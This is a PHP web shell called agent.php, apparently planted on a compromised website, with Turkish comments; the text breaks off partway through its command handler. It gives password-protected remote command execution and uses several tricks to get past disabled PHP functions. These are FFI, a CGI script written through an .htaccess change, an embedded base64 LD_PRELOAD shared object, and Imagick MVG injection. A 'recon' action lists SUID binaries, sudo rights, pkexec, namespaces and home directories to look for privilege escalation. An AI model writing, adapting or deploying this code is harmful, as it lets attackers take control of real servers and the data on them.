File: /home/u176630765/domains/ringroadhonda.com/public_html/agent.php
<?php
session_start();
error_reporting(0);
set_time_limit(300);
$SHELL_PASSWORD = '_11211-Q321_CYB!+_';
// === PUT/PATCH body → $_POST fallback (WAF POST engeli bypass) ===
if (($_SERVER['REQUEST_METHOD'] === 'PUT' || $_SERVER['REQUEST_METHOD'] === 'PATCH') && empty($_POST)) {
parse_str(file_get_contents('php://input'), $_POST);
}
// === Kimlik doğrulama ===
$pw = isset($_POST['password']) ? $_POST['password'] : (isset($_GET['password']) ? $_GET['password'] : '');
if (!empty($SHELL_PASSWORD) && $pw !== $SHELL_PASSWORD) {
header('Content-Type: application/json');
echo json_encode(array('status' => 'error', 'message' => 'Yetkisiz'));
exit;
}
// =====================================================================
// YARDIMCI FONKSİYONLAR
// =====================================================================
function _disabled($fn) {
static $list = null;
if ($list === null) {
$d = str_replace(' ', '', strtolower(ini_get('disable_functions')));
$list = ($d !== '') ? explode(',', $d) : array();
}
return in_array(strtolower($fn), $list);
}
function _fn($fn) {
return function_exists($fn) && !_disabled($fn);
}
// --- Doğrudan komut çalıştırma (6 yöntem) ---
function run($cmd) {
if (_fn('shell_exec')) {
$r = @shell_exec($cmd . ' 2>&1');
if ($r !== null) return $r;
}
if (_fn('exec')) {
$out = array();
@exec($cmd . ' 2>&1', $out);
$r = implode("\n", $out);
if ($r !== '') return $r;
}
if (_fn('system')) {
ob_start();
@system($cmd . ' 2>&1');
$r = ob_get_clean();
if ($r !== '') return $r;
}
if (_fn('passthru')) {
ob_start();
@passthru($cmd . ' 2>&1');
$r = ob_get_clean();
if ($r !== '') return $r;
}
if (_fn('popen')) {
$fp = @popen($cmd . ' 2>&1', 'r');
if ($fp) {
$r = '';
while (!feof($fp)) $r .= fread($fp, 8192);
pclose($fp);
if ($r !== '') return $r;
}
}
if (_fn('proc_open')) {
$desc = array(1 => array('pipe','w'), 2 => array('pipe','w'));
$p = @proc_open($cmd, $desc, $pipes);
if (is_resource($p)) {
$r = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
fclose($pipes[1]); fclose($pipes[2]);
proc_close($p);
if ($r !== '') return $r;
}
}
return null;
}
// --- FFI ile komut çalıştırma ---
function run_ffi($cmd) {
if (!class_exists('FFI')) return null;
if (version_compare(PHP_VERSION, '7.4.0', '<')) return null;
try {
$ffi = FFI::cdef("int system(const char *command);", "libc.so.6");
$tmp = '/tmp/.ag_ffi_' . md5(mt_rand());
$ffi->system($cmd . ' > ' . $tmp . ' 2>&1');
$r = '';
if (file_exists($tmp)) { $r = file_get_contents($tmp); @unlink($tmp); }
return $r;
} catch (Exception $e) { return null; }
}
// --- CGI bypass ile komut çalıştırma ---
function run_cgi($cmd) {
if (!function_exists('curl_init')) return null;
$webdir = dirname(__FILE__);
if (!is_writable($webdir)) return null;
$ht = $webdir . '/.htaccess';
$ht_bak = file_exists($ht) ? file_get_contents($ht) : false;
// .htaccess'e ExecCGI ekle
$cgi_block = "Options +ExecCGI\nAddHandler cgi-script .sh\n";
if ($ht_bak === false) {
file_put_contents($ht, $cgi_block);
} elseif (strpos($ht_bak, 'ExecCGI') === false) {
file_put_contents($ht, $cgi_block . $ht_bak);
}
$id = md5(mt_rand());
$script = $webdir . '/.ag_' . $id . '.sh';
$outf = '/tmp/.ag_cgi_' . $id;
file_put_contents($script, "#!/bin/bash\necho \"Content-Type: text/plain\"\necho \"\"\n" . $cmd . " > " . $outf . " 2>&1\ncat " . $outf . "\n");
chmod($script, 0755);
$host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'localhost';
$base = dirname(isset($_SERVER['REQUEST_URI']) ? preg_replace('/\?.*/', '', $_SERVER['REQUEST_URI']) : '/');
if ($base === '/' || $base === '\\') $base = '';
$url = 'http://127.0.0.1' . $base . '/.ag_' . $id . '.sh';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Host: ' . $host));
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_exec($ch);
curl_close($ch);
$r = null;
if (file_exists($outf)) { $r = file_get_contents($outf); @unlink($outf); }
@unlink($script);
// .htaccess geri yükle
if ($ht_bak === false) { @unlink($ht); }
elseif (strpos($ht_bak, 'ExecCGI') === false) { file_put_contents($ht, $ht_bak); }
return ($r !== null && $r !== '') ? $r : null;
}
// --- LD_PRELOAD ile komut çalıştırma ---
function run_ld($cmd) {
if (!_fn('putenv')) return null;
$has_trigger = _fn('mail') || _fn('error_log') || _fn('mb_send_mail');
if (!$has_trigger) return null;
$so = '/tmp/.ag_ld.so';
if (!file_exists($so)) {
// Precompiled .so — _CMD env'den komutu okur, > /tmp/.ld_output yazar
$b64 = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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';
@file_put_contents($so, base64_decode($b64));
@chmod($so, 0755);
}
if (!file_exists($so)) return null;
$outf = '/tmp/.ld_output';
@unlink($outf);
putenv("_CMD=" . $cmd . " > " . $outf . " 2>&1");
putenv("LD_PRELOAD=" . $so);
if (_fn('mail')) { @mail("a@b.c","","",""); }
elseif (_fn('error_log')) { @error_log("x",1,"a@b.c"); }
elseif (_fn('mb_send_mail')) { @mb_send_mail("a@b.c","",""); }
usleep(500000);
putenv("LD_PRELOAD=");
$r = null;
if (file_exists($outf)) { $r = file_get_contents($outf); @unlink($outf); }
return ($r !== null && $r !== '') ? $r : null;
}
// --- Imagick ile komut çalıştırma ---
function run_imgk($cmd) {
if (!class_exists('Imagick')) return null;
$outf = '/tmp/.ag_imgk_' . md5(mt_rand());
$mvgf = '/tmp/.ag_imgk.mvg';
$mvg = "push graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 \"ephemeral:|" . $cmd . " > " . $outf . " 2>&1\"\npop graphic-context";
file_put_contents($mvgf, $mvg);
try { $im = new Imagick(); @$im->readImage($mvgf); } catch (Exception $e) {}
@unlink($mvgf);
$r = null;
if (file_exists($outf)) { $r = file_get_contents($outf); @unlink($outf); }
return ($r !== null && $r !== '') ? $r : null;
}
// --- Akıllı çalıştırıcı: tüm yöntemleri sırayla dener ---
function smart_run($cmd) {
// 1) Doğrudan
$r = run($cmd);
if ($r !== null) return array('output' => $r, 'method' => 'direct');
// 2) FFI
$r = run_ffi($cmd);
if ($r !== null) return array('output' => $r, 'method' => 'ffi');
// 3) CGI
$r = run_cgi($cmd);
if ($r !== null) return array('output' => $r, 'method' => 'cgi');
// 4) LD_PRELOAD
$r = run_ld($cmd);
if ($r !== null) return array('output' => $r, 'method' => 'ld_preload');
// 5) Imagick
$r = run_imgk($cmd);
if ($r !== null) return array('output' => $r, 'method' => 'imagick');
return null;
}
// =====================================================================
// KOMUT YÖNLENDİRME
// =====================================================================
$action = isset($_POST['cmd']) ? $_POST['cmd'] : (isset($_GET['cmd']) ? $_GET['cmd'] : '');
header('Content-Type: application/json');
// ===================== ping =====================
if ($action === 'ping') {
echo json_encode(array('status' => 'success', 'message' => 'pong', 'server' => php_uname()));
exit;
}
// ===================== info =====================
if ($action === 'info') {
$disabled = str_replace(' ', '', ini_get('disable_functions'));
$exec_fns = array();
foreach (array('exec','shell_exec','system','passthru','popen','proc_open','pcntl_exec') as $fn) {
$exec_fns[$fn] = _fn($fn);
}
$exts = array();
foreach (array('FFI','Imagick','curl','imap','mbstring') as $e) {
$exts[$e] = ($e === 'FFI' || $e === 'Imagick') ? class_exists($e) : extension_loaded($e);
}
$bypass = array();
foreach (array('putenv','mail','error_log','mb_send_mail','iconv') as $fn) {
$bypass[$fn] = _fn($fn);
}
echo json_encode(array(
'status' => 'success',
'php_version' => phpversion(),
'sapi' => php_sapi_name(),
'os' => PHP_OS,
'uname' => php_uname(),
'user' => get_current_user(),
'uid' => function_exists('posix_geteuid') ? posix_geteuid() : '?',
'cwd' => getcwd(),
'script_dir' => dirname(__FILE__),
'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '',
'disable_functions' => $disabled,
'exec_functions' => $exec_fns,
'extensions' => $exts,
'bypass_functions' => $bypass,
'tmp_writable' => is_writable('/tmp'),
'webdir_writable' => is_writable(dirname(__FILE__)),
'open_basedir' => ini_get('open_basedir'),
));
exit;
}
// ===================== recon — tek seferde tam keşif =====================
if ($action === 'recon') {
$data = array('status' => 'success');
// PHP & sistem
$data['php_version'] = phpversion();
$data['sapi'] = php_sapi_name();
$data['os'] = PHP_OS;
$data['uname'] = php_uname();
$data['user'] = get_current_user();
$data['uid'] = function_exists('posix_geteuid') ? posix_geteuid() : '?';
$data['cwd'] = getcwd();
$data['doc_root'] = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '';
$data['open_basedir'] = ini_get('open_basedir');
$data['tmp_writable'] = is_writable('/tmp');
$data['webdir_writable'] = is_writable(dirname(__FILE__));
// disable_functions
$data['disable_functions'] = str_replace(' ', '', ini_get('disable_functions'));
// exec durumu
$exec_fns = array();
foreach (array('exec','shell_exec','system','passthru','popen','proc_open','pcntl_exec') as $fn) {
$exec_fns[$fn] = _fn($fn);
}
$data['exec_functions'] = $exec_fns;
// extensionlar
$exts = array();
foreach (array('FFI','Imagick','curl','imap','mbstring') as $e) {
$exts[$e] = ($e === 'FFI' || $e === 'Imagick') ? class_exists($e) : extension_loaded($e);
}
$data['extensions'] = $exts;
// bypass fonksiyonları
$bypass = array();
foreach (array('putenv','mail','error_log','mb_send_mail','iconv') as $fn) {
$bypass[$fn] = _fn($fn);
}
$data['bypass_functions'] = $bypass;
// Hangi exec yöntemi çalışıyor?
$exec_test = smart_run('echo AG_EXEC_OK');
if ($exec_test !== null) {
$data['exec_works'] = true;
$data['exec_method'] = $exec_test['method'];
} else {
$data['exec_works'] = false;
$data['exec_method'] = null;
}
// Eğer komut çalışıyorsa detaylı bilgi topla
if (isset($data['exec_works']) && $data['exec_works']) {
$run_fn = '_sr_' . $exec_test['method'];
// Basit wrapper
$sr = function($c) use ($exec_test) {
$m = $exec_test['method'];
if ($m === 'direct') return run($c);
if ($m === 'ffi') return run_ffi($c);
if ($m === 'cgi') return run_cgi($c);
if ($m === 'ld_preload') return run_ld($c);
if ($m === 'imagick') return run_imgk($c);
return null;
};
$data['id'] = trim($sr('id'));
$data['hostname'] = trim($sr('hostname'));
$data['kernel'] = trim($sr('uname -r'));
$data['distro'] = trim($sr('cat /etc/os-release 2>/dev/null | head -3'));
// Araçlar
$tools = array();
foreach (array('gcc','python3','python','perl','unshare','setcap','getcap','curl','wget','pkexec','sudo','docker','lxc') as $t) {
$w = $sr('which ' . $t . ' 2>/dev/null');
$tools[$t] = ($w !== null && trim($w) !== '') ? trim($w) : false;
}
$data['tools'] = $tools;
// userns
$data['userns_clone'] = trim($sr('cat /proc/sys/kernel/unprivileged_userns_clone 2>/dev/null'));
$data['max_user_namespaces'] = trim($sr('cat /proc/sys/user/max_user_namespaces 2>/dev/null'));
// SUID
$data['suid_files'] = trim($sr('find / -perm -4000 -type f 2>/dev/null | head -25'));
// pkexec version
$data['pkexec_version'] = trim($sr('pkexec --version 2>/dev/null'));
// sudo -l
$data['sudo_l'] = trim($sr('sudo -n -l 2>&1'));
// writable dirs
$data['writable_tmp'] = trim($sr('ls -la /tmp/ 2>/dev/null | head -5'));
// /etc/passwd user sayısı
$data['passwd_users'] = trim($sr('cat /etc/passwd 2>/dev/null | grep -c "/bin/bash"'));
// home dizinleri
$data['home_dirs'] = trim($sr('ls -la /home/ 2>/dev/null'));
}
echo json_encode($data);
exit;
}
// ===================== exec — komut çalıştır =====================
if ($action === 'exec') {
$command = isset($_POST['command']) ? $_POST['command'] : '';
$method = isset($_POST['method']) ? $_POST['method'] : 'auto';
if (empty($command)) {
echo json_encode(array('status' => 'error', 'message' => 'Komut boş'));
exit;
}
$dir = isset($_POST['dir']) ? $_POST['dir'] : '';
if ($dir) {
$command = 'cd ' . escapeshellarg($dir) . ' && ' . $command;
}
$output = null;
$used_method = null;
if ($method === 'auto' || $method === 'smart') {
$r = smart_run($command);
if ($r !== null) { $output = $r['output']; $used_method = $r['method']; }
} elseif ($method === 'direct') {
$output = run($command);
$used_method = 'direct';
} elseif ($method === 'ffi') {
$output = run_ffi($command);
$used_method = 'ffi';
} elseif ($method === 'cgi') {
$output = run_cgi($command);
$used_method = 'cgi';
} elseif ($method === 'ld') {
$output = run_ld($command);
$used_method = 'ld_preload';
} elseif ($method === 'imagick') {
$output = run_imgk($command);
$used_method = 'imagick';
}
if ($output === null) {
